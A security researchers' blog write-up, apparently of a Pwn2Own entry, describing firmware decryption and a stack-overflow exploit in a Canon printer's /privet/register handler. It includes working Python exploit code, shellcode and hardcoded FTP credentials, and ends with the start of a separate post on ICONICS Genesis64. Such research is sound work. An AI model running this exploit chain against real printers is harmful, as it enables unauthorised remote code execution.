As a side note, once the serial number was obtained, we could download several version of the firmware, for different operating systems. For example, version 06.03 for macOS has the following filename: mac-mf644-a-fw-v0603-64.dmg and the associated download link is https://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do?id=OTUwMzkyMzJk&cmp=ABR&lang=EN. As the URL implies, this page asks for the serial number and redirects you to the actual firmware if the serial is valid. In that case: https://gdlp01.c-wss.com/gds/5/0400006275/01/mac-mf644-a-fw-v0603-64.dmg.

Of course, the base64 encoded id in the first URL is interesting: once decoded, you get the (literal string) 95039232d, which in turn, is the hex representation of 40000627501, which is part of the actual firmware URL!

A few more examples led us to understand that the part of the URL with the single digit (/5/ in our case) is just the last digit of the next part of the URL's path (/0400006275/ in this example). We assume this is probably used for load balancing or another similar reason. Using this knowledge, we were able to download a lot of different firmware images for various models. We also found out that Canon pages for USA or Europe are not as current as the Japanese page which had version 09.01 at the time of writing.

However, all of them lag behind the reality: the latest firmware version was 10.02, which is actually retrieved by the printer's firmware update mechanism. https://gdlp01.c-wss.com/rmds/oi/fwupdate/mf640c_740c_lbp620c_660c/contents.xml gives us the actual up-to-date version.

Firmware types

A small note about firmware "types". The update XML has 3 different entries per content kind:

<contents-information>
  <content kind="bootable" value="1" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
    <query arg="id" value="OTUwMzZkMDQ5" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  </content>
  <content kind="bootable" value="2" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
    <query arg="id" value="OTUwMzZkMGFk" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  </content>
  <content kind="bootable" value="3" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
    <query arg="id" value="OTUwMzZkMTEx" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  </content>

Which correspond to:

gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEA_V10.02.bin
gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEB_V10.02.bin
gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEC_V10.02.bin

Each type corresponds to one of the models listed in the XML URL:

MF640C => TYPEA
MF740C => TYPEB
LBP620C => TYPEC

Decryption: black box attempts

Basic firmware extraction

Windows updates such as win-mf644-a-fw-v0603.exe are Zip SFX files, which contain the actual updater: mf644c_v0603_typea_w.exe. This is the end of the PE file as seen in Hiew:

004767F0:  58 50 41 44-44 49 4E 47-50 41 44 44-49 4E 47 58  XPADDINGPADDINGX
00072C00:  4E 43 46 57-00 00 00 00-3D 31 5D 08-20 00 00 00  NCFW    =1]

As you can see (the address changes from RVA to physical offset), the firmware update seems to be stored at the end of the PE as an overlay, and conveniently starts with a NCFW magic header. MacOS firmware updates can be extracted with 7z and contain a big file: mf644c_v0603_typea_m64.app/Contents/Resources/.USTBINDDATA which is almost the same as the Windows overlay except for the PE signature, and some offsets.

After looking at a bunch of firmware, it became clear that the footer of the update contains information about various parts of the firmware update, including a nice USTINFO.TXT file which describes the target model, etc. The NCFW magic also appears several times in the biggest "file" described by the UST footer. After some trial and error, its format was understood and allowed us to split the firmware into its basic components.

All this information was compiled into the unpack_fw.py script.

Weak encryption, but how weak?

The main firmware file Bootable.bin.sig is encrypted, but it seems encrypted with a very simple algorithm, as we can determine by looking at the patterns:

00000040  20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F  !"#$%&'()*+,-./
00000050  30 31 32 33 34 35 36 37 38 39 3A 3B 39 FC E8 7A 0123456789:;9..z
00000060  34 35 4F 50 44 45 46 37 48 49 CA 4B 4D 4E 4F 50 45OPDEF7HI.KMNOP
00000070  51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 QRSTUVWXYZ[\]^_`

The usual assumption of having big chunks of 00 or FF in the plaintext firmware allows us to have different hypothesis about the potential encryption algorithm. The increasing numbers most probably imply some sort of byte counter. We then tried to combine it with some basic operations and tried to decrypt:

A xor with a byte counter => fail
A xor with counter and feedback => fail

Attempting to use a known plaintext (where the plaintext is not 00 or FF) was impossible at this stage as we did not have a decrypted firmware image yet. Having a reverser in the team, the obvious next step was to try to find code which implements the decryption:

The updater tool does not decrypt the firmware but sends it as-is => fail
Check the firmware of previous models to try to find unencrypted code which supports encrypted "NCFW" updates:
- FAIL
- However, we found unencrypted firmware files with a similar structure which gave use a bit of known plaintext, but did not give any real clue about the solution

Hardware: first look

Main board and serial port

Once we received the printer, we of course started dismantling it to look for interesting hardware features and ways to help us get access to the firmware.

Looking at the hardware we considered these different approaches to obtain more information:
An SPI is present on the mainboard, read it
An Unsolder eMMC is present on the mainboard, read it
Find an older model, with unencrypted firmware and simpler flash to unsolder, read, profit. Fortunately, we did not have to go further in this direction.
Some printers are known to have a serial port for debug providing a mini shell. Find one and use it to run debug commands in order to get plaintext/memory dump (NOTE of course we found the serial port afterwards)

Service mode

All enterprise printers have a service mode, intended for technicians to diagnose potential problems. YouTube is a good source of info on how to enter it. On this model, the dance is a bit weird as one must press "invisible" buttons. Once in service mode, debug logs can be dumped on a USB stick, which creates several files:

SUBLOG.TXT
SUBLOG.BIN is obviously SUBLOG.TXT, encrypted with an algorithm which exhibits the same patterns as the encrypted firmware.

Decrypting firmware

Program synthesis approach

At this point, this was our train of thought:

The encryption algorithm seemed "trivial" (lots of patterns, byte by byte)
SUBLOG.TXT gave us lots of plaintext
We were too lazy to find it by blackbox/reasoning

As program synthesis has evolved quite fast in the past years, we decided to try to get a tool to synthesize the decryption algorithm for us. We of course used the known plaintext from SUBLOG.TXT, which can be used as constraints. Rosette seemed easy to use and well suited, so we went with that. We started following a nice tutorial which worked over the integers, but gave us a bit of a headache when trying to directly convert it to bitvectors.

However, we quickly realized that we didn't have to synthesize a program (for all inputs), but actually solve an equation where the unknown was the program which would satisfy all the constraints built using the known plaintext/ciphertext pairs. The "Essential" guide to Rosette covers this in an example for us. So we started by defining the "program" grammar and crypt function, which defines a program using the grammar, with two operands, up to 3 layers deep:

(define int8? (bitvector 8))
(define (int8 i)
  (bv i int8?))

(define-grammar (fast-int8 x y)  ; Grammar of int32 expressions over two inputs:
  [expr
   (choose x y (?? int8?)        ; <expr> := x | y | <32-bit integer constant> |
           ((bop) (expr) (expr))  ;           (<bop> <expr> <expr>) |
           ((uop) (expr)))]       ;           (<uop> <expr>)
  [bop
   (choose bvadd bvsub bvand      ; <bop>  := bvadd  | bvsub | bvand |
           bvor bvxor bvshl       ;           bvor   | bvxor | bvshl |
           bvlshr bvashr)]        ;           bvlshr | bvashr
  [uop
   (choose bvneg bvnot)])         ; <uop>  := bvneg | bvnot

(define (crypt x i)
  (fast-int8 x i #:depth 3))

Once this is done, we can define the constraints, based on the known plain/encrypted pairs and their position (byte counter i). And then we ask Rosette for an instance of the crypt program which satisfies the constraints:

(define sol (solve
  (assert
; removing constraints speed things up
    (&& (bveq (crypt (int8 #x62) (int8 0)) (int8 #x3d))
; [...]        
        (bveq (crypt (int8 #x69) (int8 7)) (int8 #x3d))
        (bveq (crypt (int8 #x06) (int8 #x16)) (int8 #x20))
        (bveq (crypt (int8 #x5e) (int8 #x17)) (int8 #x73))
        (bveq (crypt (int8 #x5e) (int8 #x18)) (int8 #x75))
        (bveq (crypt (int8 #xe8) (int8 #x19)) (int8 #x62))
; [...]        
        (bveq (crypt (int8 #xc3) (int8 #xe0)) (int8 #x3a))
        (bveq (crypt (int8 #xef) (int8 #xff)) (int8 #x20))
        )
    )
  ))

(print-forms sol)

After running racket rosette.rkt and waiting for a few minutes, we get the following output:

(list 'define '(crypt x i)
 (list
  'bvor
  (list 'bvlshr '(bvsub i x) (list 'bvadd (bv #x87 8) (bv #x80 8)))
  '(bvsub (bvadd i i) (bvadd x x))))

which is a valid decryption program ! But it's a bit untidy. So let's convert it to C, with a trivial simplification:

uint8_t crypt(uint8_t i, uint8_t x) {
    uint8_t t = i-x;
    return (((2*t)&0xFF)|((t>>((0x87+0x80)&0xFF))&0xFF))&0xFF;
}

and compile it with gcc -m32 -O2 using https://godbolt.org to get the optimized version:

mov     al, byte ptr [esp+4]
sub     al, byte ptr [esp+8]
rol     al
ret

So our encryption algorithm was a trivial ror(x-i, 1)!

Exploiting setup

After we decrypted the firmware and noticed the serial port, we decided to set up an environment that would facilitate our exploitation of the vulnerability.

We set up a Raspberry Pi on the same network as the printer that we also connected to the serial port of the printer. In this way we could remotely exploit the vulnerability while controlling the status of the printer via many features offered by the serial port.

Serial port: dry shell

The serial port gave us access to the aforementioned dry shell which provided incredible help to understand / control the printer status and debug it during our exploitation attempts.

Among the many powerful features offered, here are the most useful ones:

The ability to perform a full memory dump: a simple and quick way to retrieve the updated firmware unencrypted.
The ability to perform basic filesystem operations.
The ability to list the running tasks and their associated memory segments.
The ability to start an FTP daemon, this will come handy later.
The ability to inspect the content of memory at a specific address.

This feature was used a lot to understand what was going on during exploitation attempts. One of the annoying things is the presence of a watchdog which restarts the whole printer if the HTTP daemon crashes. We had to run this command quickly after any exploitation attempts.

Vulnerability

Attack surface

The Pwn2Own rules state that if there's authentication, it should be bypassed. Thus, the easiest way to win is to find a vulnerability in a non authenticated feature. This includes obvious things like:

Printing functions and protocols,
Various web pages,
The HTTP server,
The SNMP server.

We started by enumerating the "regular" web pages that are handled by the web server (by checking the registered pages in the code), including the weird /elf/ subpages. We then realized some other URLs were available in the firmware, which were not obviously handled by the usual code: /privet/, which are used for cloud based printing.

Vulnerable function

Reverse engineering the firmware is rather straightforward, even if the binary is big. The CPU is standard ARMv7. By reversing the handlers, we quickly found the following function. Note that all names were added manually, either taken from debug logging strings or after reversing:

int __fastcall ntpv_isXPrivetTokenValid(char *token)
{
  int tklen; // r0
  char *colon; // r1
  char *v4; // r1
  int timestamp; // r4
  int v7; // r2
  int v8; // r3
  int lvl; // r1
  int time_delta; // r0
  const char *msg; // r2
  char buffer[256]; // [sp+4h] [bp-174h] BYREF
  char str_to_hash[28]; // [sp+104h] [bp-74h] BYREF
  char sha1_res[24]; // [sp+120h] [bp-58h] BYREF
  int sha1_from_token[6]; // [sp+138h] [bp-40h] BYREF
  char last_part[12]; // [sp+150h] [bp-28h] BYREF
  int now; // [sp+15Ch] [bp-1Ch] BYREF
  int sha1len; // [sp+164h] [bp-14h] BYREF

  bzero(buffer, 0x100u);
  bzero(sha1_from_token, 0x18u);
  memset(last_part, 0, sizeof(last_part));
  bzero(str_to_hash, 0x1Cu);
  bzero(sha1_res, 0x18u);
  sha1len = 20;
  if ( ischeckXPrivetToken() )
  {
    tklen = strlen(token);
    base64decode(token, tklen, buffer);
    colon = strtok(buffer, ":");
    if ( colon )
    {
      strncpy(sha1_from_token, colon, 20);
      v4 = strtok(0, ":");
      if ( v4 )
        strncpy(last_part, v4, 10);
    }
    sprintf_0(str_to_hash, "%s%s%s", x_privet_secret, ":", last_part);
    if ( sha1(str_to_hash, 28, sha1_res, &sha1len) )
    {
      sha1_res[20] = 0;
      if ( !strcmp_0((unsigned int)sha1_from_token, sha1_res, 0x14u) )
      {
        timestamp = strtol2(last_part);
        time(&now, 0, v7, v8);
        lvl = 86400;
        time_delta = now - LODWORD(qword_470B80E0[0]) - timestamp;
        if ( time_delta <= 86400 )
        {
          msg = "[NTPV] %s: x-privet-token is valid.\n";
          lvl = 5;
        }
        else
        {
          msg = "[NTPV] %s: issue_timecounter is expired!!\n";
        }
        if ( time_delta <= 86400 )
        {
          log(3661, lvl, msg, "ntpv_isXPrivetTokenValid");
          return 1;
        }
        log(3661, 5, msg, "ntpv_isXPrivetTokenValid");
      }
      else
      {
        log(3661, 5, "[NTPV] %s: SHA1 hash value is invalid!!\n", "ntpv_isXPrivetTokenValid");
      }
    }
    else
    {
      log(3661, 3, "[NTPV] ERROR %s fail to generate hash string.\n", "ntpv_isXPrivetTokenValid");
    }
    return 0;
  }
  log(3661, 6, "[NTPV] %s() DEBUG MODE: Don't check X-Privet-Token.", "ntpv_isXPrivetTokenValid");
  return 1;
}

The vulnerable code is the following line:

base64decode(token, tklen, buffer);

With some thought, one can recognize the bug from the function signature itself -- there is no buffer length parameter passed in, meaning base64decode has no knowledge of buffer bounds. In this case, it decodes the base64-encoded value of the X-Privet-Token header into the local, stack based buffer which is 256 bytes long. The header is attacker-controlled is limited only by HTTP constraints, and as a result can be much larger. This leads to a textbook stack-based buffer overflow. The stack frame is relatively simple:

-00000178 var_178         DCD ?
-00000174 buffer          DCB 256 dup(?)
-00000074 str_to_hash     DCB 28 dup(?)
-00000058 sha1_res        DCB 20 dup(?)
-00000044 var_44          DCD ?
-00000040 sha1_from_token DCB 24 dup(?)
-00000028 last_part       DCB 12 dup(?)
-0000001C now             DCD ?
-00000018                 DCB ? ; undefined
-00000017                 DCB ? ; undefined
-00000016                 DCB ? ; undefined
-00000015                 DCB ? ; undefined
-00000014 sha1len         DCD ?
-00000010
-00000010 ; end of stack variables

The buffer array is not really far from the stored return address, so exploitation should be relatively easy. Initially, we found the call to the vulnerable function in the /privet/printer/createjob URL handler, which is not accessible before authenticating, so we had to dig a bit more.

ntpv functions

The various ntpv URLs and handlers are nicely defined in two different arrays of structures as you can see below:

privet_url nptv_urls[8] =
{
  { 0, "/privet/info", "GET" },
  { 1, "/privet/register", "POST" },
  { 2, "/privet/accesstoken", "GET" },
  { 3, "/privet/capabilities", "GET" },
  { 4, "/privet/printer/createjob", "POST" },
  { 5, "/privet/printer/submitdoc", "POST" },
  { 6, "/privet/printer/jobstate", "GET" },
  { 7, NULL, NULL }
};

DATA:45C91C0C nptv_cmds       id_cmd <0, ntpv_procInfo>
DATA:45C91C0C                                         ; DATA XREF: ntpv_cgiMain+338↑o
DATA:45C91C0C                                         ; ntpv_cgiMain:ntpv_cmds↑o
DATA:45C91C0C                 id_cmd <1, ntpv_procRegister>
DATA:45C91C0C                 id_cmd <2, ntpv_procAccesstoken>
DATA:45C91C0C                 id_cmd <3, ntpv_procCapabilities>
DATA:45C91C0C                 id_cmd <4, ntpv_procCreatejob>
DATA:45C91C0C                 id_cmd <5, ntpv_procSubmitdoc>
DATA:45C91C0C                 id_cmd <6, ntpv_procJobstate>
DATA:45C91C0C                 id_cmd <7, 0>

After reading the documentation and reversing the code, it appeared that the register URL was accessible without authentication and called the vulnerable code.

Exploitation

Triggering the bug

Using a pattern generated with rsbkb, we were able to get the following crash on the serial port:

Dry> < Error Exception >
 CORE : 0
 TYPE : prefetch
 ISR  : FALSE
 TASK ID   : 269
 TASK Name : AsC2
 R 0  : 00000000
 R 1  : 00000000
 R 2  : 40ec49fc
 R 3  : 49789eb4
 R 4  : 316f4130
 R 5  : 41326f41
 R 6  : 6f41336f
 R 7  : 49c1b38c
 R 8  : 49d0c958
 R 9  : 00000000
 R10  : 00000194
 R11  : 45c91bc8
 R12  : 00000000
 R13  : 4978a030
 R14  : 4167a1f4
 PC   : 356f4134
 PSR  : 60000013
 CTRL : 00c5187d
        IE(31)=0

Which gives:

$ rsbkb bofpattoff 4Ao5
Offset: 434 (mod 20280) / 0x1b2

Astute readers will note that the offset is too big compared to the local stack frame size, which is only 0x178 bytes. Indeed, the correct offset for PC, from the start of the local buffer is 0x174. The 0x1B2 which we found using the buffer overflow pattern actually triggers a crash elsewhere and makes exploitation way harder. So remember to always check if your offsets make sense.

Buffer overflow

As the firmware is lacking protections such as stack cookies, NX, and ASLR, exploiting the buffer overflow should be rather straightforward, despite the printer running DRYOS which differs from usual operating systems. Using the information gathered while researching the vulnerability, we built the following class to exploit the vulnerability and overwrite the PC register with an arbitrary address:

import struct

class PrivetPayload:
    def __init__(self, ret_addr=0x1337):
        self.ret_addr = ret_addr

    @property
    def r4(self):
        return b"\x44\x44\x44\x44"

    @property
    def r5(self):
        return b"\x55\x55\x55\x55"

    @property
    def r6(self):
        return b"\x66\x66\x66\x66"

    @property
    def pc(self):
        return struct.pack("<I", self.ret_addr)

    def __bytes__(self):
        return (
            b":" * 0x160
            + struct.pack("<I", 0x20)  # pHashStrBufLen
            + self.r4
            + self.r5
            + self.r6
            + self.pc
        )

The vulnerability can then be triggered with the following code, assuming the printer's IP address is 192.168.1.100:

import base64
import http.client

payload = privet.PrivetPayload()
headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
    "X-Privet-Token": base64.b64encode(bytes(payload)),
}

conn = http.client.HTTPConnection("192.168.1.100", 80)
conn.request("POST", "/privet/register", "", headers)

To confirm that the exploit was extremely reliable, we simply jumped to a debug function's entry point (which printed information to the serial console) and observed it worked consistently — though the printer rebooted afterwards because we hadn't cleaned the stack.

With this out of the way, we now need to work on writing a useful exploit. After reaching out to the organizers to learn more about their expectations regarding the proof of exploitation, we decided to show a custom image on the printer's LCD screen.

To do so, we could basically:

Store our exploit in the buffer used to trigger the overflow and jump into it,
Find another buffer we controlled and jump into it,
Rely only on return-oriented programming.

Though the first method would have been possible (we found a convenient add r3, r3, #0x103 ; bx r3 gadget), we were limited by the size of the buffer itself, even more so because parts of it were being rewritten in the function's body. Thus, we decided to look into the second option by checking other protocols supported by the printer.

BJNP

One of the supported protocols is BJNP, which was conveniently exploited by Synacktiv ninjas on a different printer, accessible on UDP port 8611. This project adds a BJNP backend for CUPS, and the protocol itself is also handled by Wireshark.

In our case, BJNP is very useful: it can handle sessions and allows the client to store data (up to 0x180 bytes) on the printer for the duration of the session, which means we can precisely control until when our payload will remain available in memory. Moreover, this data is stored in the field of a global structure, which means it is always located at the same address for a given firmware. For the sake of our exploit, we reimplemented parts of the protocol using Scapy:

from scapy.packet import Packet
from scapy.fields import (
    EnumField,
    ShortField,
    StrLenField,
    BitEnumField,
    FieldLenField,
    StrFixedLenField,
)

class BJNPPkt(Packet):
    name = "BJNP Packet"

    BJNP_DEVICE_ENUM = {
        0x0: "Client",
        0x1: "Printer",
        0x2: "Scanner",
    }

    BJNP_COMMAND_ENUM = {
        0x000: "GetPortConfig",
        0x201: "GetNICInfo",
        0x202: "NICCmd",
        0x210: "SessionStart",
        0x211: "SessionEnd",
        0x212: "GetSessionInfo",
        0x220: "DataRead",
        0x221: "DataWrite",
        0x230: "GetDeviceID",
        0x232: "CmdNotify",
        0x240: "AppCmd",
    }

    BJNP_ERROR_ENUM = {
        0x8200: "Invalid header",
        0x8300: "Session error",
        0x8502: "Session already exists",
    }

    fields_desc = [
        StrFixedLenField("magic", default=b"MFNP", length=4),
        BitEnumField("device", default=0, size=1, enum=BJNP_DEVICE_ENUM),
        BitEnumField("cmd", default=0, size=15, enum=BJNP_COMMAND_ENUM),
        EnumField("err_no", default=0, enum=BJNP_ERROR_ENUM, fmt="!H"),
        ShortField("seq_no", default=0),
        ShortField("sess_id", default=0),
        FieldLenField("body_len", default=None, length_of="body", fmt="!I"),
        StrLenField("body", b"", length_from=lambda pkt: pkt.body_len),
    ]

For our version of the firmware, the BJNP structure is located at 0x46F2B294 and the session data sent by the client is stored at offset 0x24. We also want our payload to run in thumb mode to reduce its size, which means we need to jump to an odd address. All in all, we can simply overwrite the pc register with 0x46F2B294+0x24+1=0x46F2B2B9 in our original payload to reach the BJNP session buffer.

Initial PoC

Quick recap of the exploitation strategy:

Start a BJNP session and store our exploit in the session data,
Exploit the buffer overflow to jump in the session buffer,
Close the BJNP session to remove our exploit from memory once it ran.

To demonstrate this, we can jump to the function which disables the energy save mode on the printer (and wakes the screen up, which is useful to check if it actually worked). In our firmware, it is located at 0x413054D8, and we simply need to set the r0 register to 0 before calling it:

mov r0, #0
mov r12, #0x54D8
movt r12, #0x4130
blx r12

To avoid the printer rebooting, we can also fix the r0 and lr registers to restore the original flow:

mov r0, #0
mov r1, #0xEBA0
movt r1, #0x40DE
mov lr, r1
bx lr

Putting it all together, here is an exploit which does just that:

import time
import socket
import base64
import http.client

def store_payload(sock, payload):
    assert len(payload) <= 0x180, ValueError(
        "Payload too long: {} is greater than {}".format(len(payload), 0x180)
    )

    pkt = BJNPPkt(
        cmd=0x210,
        seq_no=0,
        sess_id=1,
        body=(b"\x00" * 8 + payload + b"\x00" * (0x180 - len(payload))),
    )
    pkt.show2()
    sock.sendall(bytes(pkt))

    res = BJNPPkt(sock.recv(4096))
    res.show2()

    # The printer should return a valid session ID
    assert res.sess_id != 0, ValueError("Failed to create session")

def cleanup_payload(sock):
    pkt = BJNPPkt(
        cmd=0x211,
        seq_no=0,
        sess_id=1,
    )
    pkt.show2()
    sock.sendall(bytes(pkt))

    res = BJNPPkt(sock.recv(4096))
    res.show2()

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(("192.168.1.100", 8610))

bjnp_payloads = bytes.fromhex("4FF0000045F2D84C44F2301CE0474FF000004EF6A031C4F2DE018E467047")
store_payload(sock, bjnp_payload)

privet_payload = privet.PrivetPayload(ret_addr=0x46F2B2B9)
headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
    "X-Privet-Token": base64.b64encode(bytes(privet_payload)),
}

conn = http.client.HTTPConnection("192.168.1.100", 80)
conn.request("POST", "/privet/register", "", headers)

time.sleep(5)

cleanup_payload(sock)
sock.close()

Payload

We can now build upon this PoC to create a meaningful payload. As we want to display a custom image on screen, we need to:

Find a way of uploading the image data (as we're limited to 0x180 bytes in total in the BJNP session buffer),
Make sure the screen is turned on (for example, by disabling the energy save mode as above),
Call the display function with our image data to show it on screen.

Displaying an image

As the firmware contains a number of debug functions, we were able to understand the display mechanism rather quickly. There is a function able to write an image into the frame buffer (located at 0x41305158 in our firmware) which takes two arguments: the address of an RGB image, and the address of a frame buffer structure which looks like below:

struct frame_buffer_struct {
    unsigned short x;
    unsigned short y;
    unsigned short width;
    unsigned short height;
};

The frame buffer can only be used to display 320x240 pixels at a time which isn't enough to cover the whole screen as it is 800x480 pixels. We push this structure on the stack with the following code:

sub sp, #8
mov r0, #320
strh r0, [sp, #4]  ; width
mov r0, #240
strh r0, [sp, #6]  ; height
mov r0, #0
strh r0, [sp]      ; x
strh r0, [sp, #2]  ; y

Once this is done, assuming r5 contains the address of our image buffer, we display it on screen with the following code:

; Display frame buffer
mov r1, r5         ; Image buffer
mov r0, sp         ; Frame buffer struct
mov r12, #0x5158
movt r12, #0x4130
blx r12

This leaves the question of the image buffer itself.

FTP

Though we thought of multiple options to upload the image, we ended up deciding to use a legitimate feature of the printer: it can serve as an FTP server, which is disabled by default. Thus, we need to:

Enable the ftpd service,
Upload our image from the client,
Read the image in a buffer.

In our firmware, the function to enable the ftpd service is located at 0x4185F664 and takes 4 arguments: the maximum number of simultaneous client, the timeout, the command port, and the data port. It can be enabled with the following payload:

mov r0, #0x3       ; Max clients
mov r1, #0x0       ; Timeout
mov r2, #21        ; Command port
mov r3, #20        ; Data port
mov r12, #0xF664
movt r12, #0x4185
blx r12

The ftpd service also has a feature to change directory. This doesn't really matter to us since the default directory is always S:/. We could however decide to change it to: either access data stored on other paths (e.g. the admin password) or to ensure our exploit works correctly even if the directory was somehow changed beforehand. To do so, we would need to call the function at 0x4185E2A4 with the r0 register set to the address of the new path string.

Once enabled, the FTP server requires credentials to connect. Fortunately for us, they are hardcoded in the firmware as guest / welcome.. We can upload our image (called a in this example) with the following code:

import ftplib

with ftplib.FTP(host="192.168.1.100", user="guest", passwd="welcome.") as ftp:
    with open("image.raw") as f:
        ftp.storbinary("STOR a", f)

File system

We are simply left with reading the image from the filesystem. Thankfully, DRYOS has an abstraction layer to handle this, allowing us to only look for the equivalent of the usual open, read, and close functions. In our firmware, they are located respectively at 0x416917C8, 0x41691A20, and 0x41691878. Assuming r5 contains the address of our image path, we can open the file like so:

mov r2, #0x1C0
mov r1, #0
mov r0, r5         ; Image path
mov r12, #0x17C8
movt r12, #0x4169
blx r12
mov r5, r0         ; File handle

; Exit if there was an error opening the file
cmp r5, #0
ble .end

The image being too large to store on the stack, we could decide to dynamically allocate a buffer. However, the firmware contains debug images stored in writable memory, so we decided to overwrite one of them instead to simplify the exploit. We went with 0x436A3F64, which originally contains a screenshot of a calculator.

Here is the payload to read the content of the file into this buffer:

; Get address of image buffer
mov r10, #0x3F64
movt r10, #0x436A

; Compute image size
mov r2, #320       ; Width
mov r3, #240       ; Height
mov r6, #3         ; Depth
mul r6, r6, r2
mul r6, r6, r3

; Read content of file in buffer
mov r3, #0         ; Bytes read
mov r4, r6         ; Bytes left to read
.loop:
mov r2, r4         ; Number of bytes to read
add r1, r10, r3    ; Buffer position
mov r0, r5         ; File handle
mov r12, #0x1A20
movt r12, #0x4169
blx r12
cmp r0, #0
ble .end_read      ; Exit in case of an error
add r3, r3, r0
sub r4, r4, r0
cmp r4, #0
bgt .loop

For completeness, here is how to close the file:

mov r0, r5
mov r12, #0x1878
movt r12, #0x4169
blx r12

Putting everything together

In the end, our exploit is split into 3 parts:

Execute a first payload to enable the ftpd service and change to the S:/ directory,
Upload our image using FTP,
Exploit the vulnerability with another payload reading the image and displaying it on the screen.

You can find the script handling all this in the exploit.zip and you can see the exploit in action here.

It feels a bit... Anticlimactic? Where is the Doom port for DRYOS when you need it...

Patch

Canon published an advisory in March 2022 alongside a firmware update.

A quick look at this new version shows that the /privet endpoint is no longer reachable: the function registering this path now logs a message before simply exiting, and the /privet string no longer appears in the binary. Despite this, it seems like the vulnerable code itself is still there - though it is now supposedly unreachable. Strings related to FTP have also been removed, hinting that Canon may have disabled this feature as well.

As a side note, disabling this feature makes sense since Google Cloud Print was discontinued on December 31, 2020, and Canon announced they no longer supported it as of January 1, 2021.

Conclusion

In the end, we achieved a perfectly reliable exploit for our printer. It should be noted that our whole work was based on the European version of the printer, while the American version was used during the contest, so a bit of uncertainty still remained on the d-day. Fortunately, we had checked that the firmware of both versions matched beforehand.

We also adapted the offsets in our exploit to handle versions 9.01, 10.02, and 10.03 (released during the competition) in case the organizers' printer was updated. To do so, we built a script to automatically find the required offsets in the firmware and update our exploit.

All in all, we were able to remotely display an image of our choosing on the printer's LCD screen, which counted as a success and earned us 2 Master of Pwn points.

Competing in Pwn2Own ICS 2022 Miami: Exploiting a zero click remote memory corruption in ICONICS Genesis64

Diary of a reverse-engineer

By: Axel "0vercl0k" Souchet

5 May 2023 at 15:00

🧾 Introduction

After participating in Pwn2Own Austin in 2021 and failing to land my remote kernel exploit Zenith (which you can read about here), I was eager to try again. It is fun and forces me to look at things I would never have looked at otherwise. The one thing I couldn't do during my last participation in 2021 was to fly on-site and soak in the whole experience. I wanted a massive adrenaline rush on stage (as opposed to being in the comfort of your home), to hang-out, to socialize and learn from the other contestants.

So when ZDI announced an in-person competition in Miami in 2022.. I was stoked but I knew nothing about Industrial Control System software (I still don't 😅). After googling around, I realized that several of the targets ran on Windows 😮 which is the OS I am most familiar with, so that was a big plus given the timeline. The ZDI originally announced the contest at the end of October 2022, and it was supposed to happen about three months later, in January 2023.

In this blog post, I'm hoping to walk you through my journey of participating & demonstrating a winning 0-click remote entry on stage in Miami 🛬. If you want to skip the details to the exploit code, everything is available on my GitHub repository Paracosme.

Table of contents:

⚙️ Target selection

All right, let me set the stage. It is November 2021 in Seattle; the sun sets early, it is cozy and warm inside; and I have decided to try to participate in the contest. As I mentioned in the intro, I have about three months to discover an exploitable vulnerability and write a reliable enough exploit for it. Honestly, I thought that timeline was a bit tight given that I can only invest an hour or two on average per workday (probably double that for weekends). As a result, progress will be slow, and will require discipline to put in the hours after a full day of work 🫡. And if it doesn't go anywhere, then it doesn't. Things don't work out often in life, nothing new 🤷🏽‍♂️.

One thing I was excited about was to pick a target running on Windows to use my favorite debugger, WinDbg. Given the timeline, I felt good to not to have to fight with gdb and/or lldb 🤢. But as I said above, I have no experience with anything related to ICS software. I don't know what it's supposed to do, where, how, when. Although I've tried to document myself as much as possible by reading all the literature I could find, I quickly realized that the infosec community didn't cover it that much.

Regarding the contest, the ZDI broke it down into four main categories with multiple targets, vectors, and cash prizes. Reading through the rules, I didn't really recognize any of the vendors, everything was very foreign to me. So, I started to look for something that checked a few boxes:

I need to run a demo version of the software in a regular Windows VM to introspect the target easily through a debugger. I learned my lessons from my Zenith exploit where I couldn't debug my exploit on the real target. This time, I want to be able to debug the exploit on the real target to stand a chance to have it land during the contest.
The target is written in a memory unsafe language like C or C++. It is nicer to reverse-engineer and certainly contains memory safety issues that I could use. In hindsight, it probably wasn't the best choice. Most of the other contestants exploited logic vulnerabilities which are in general: more reliable to exploit (less chance to lose the cash prize, less time spent building the exploit), and might be easier to find (more tooling opportunities?).
Existing research/documentation/anything I can build on top of would be amazing.

After trying a few things for a week or two, I decided to target ICONICS Genesis64 in the Control Server category via the 0 click over-the-network vector. An ethernet cable is connecting you to the target device, and you throw your exploit against one of Genesis64's listening sockets and need to demonstrate code execution without any user interaction 🔥.

Luigi Auriemma published a plethora of vulnerabilities affecting the GenBroker64.exe server (which is part of Genesis64) in 2011. Many of those bugs look powerful and shallow, which gave me confidence that plenty more still exist today. At the same time, it was the only public thing I found, and it was a decade old, which is... a very long time ago.

🐛 Vulnerability research

I started the adventure a few weeks after the official announcement by downloading a demo version of the software, installing it in a VM, and starting to reverse-engineer the GenBroker64.exe service with laser focus. GenBroker64.exe is a regular Windows program available in both 32 or 64-bit versions but ultimately will be run on modern Windows 10 64-bit with default configuration. In hindsight, I made a mistake and didn't spend enough time enumerating the attack surfaces available. Instead, I went after the same ones as Luigi when there were probably better / less explored candidates. Live and learn I guess 😔.

I opened the file in IDA and got confused at first as it thinks it is a .NET binary. This contradicted Luigi's findings I looked at previously 🤔.

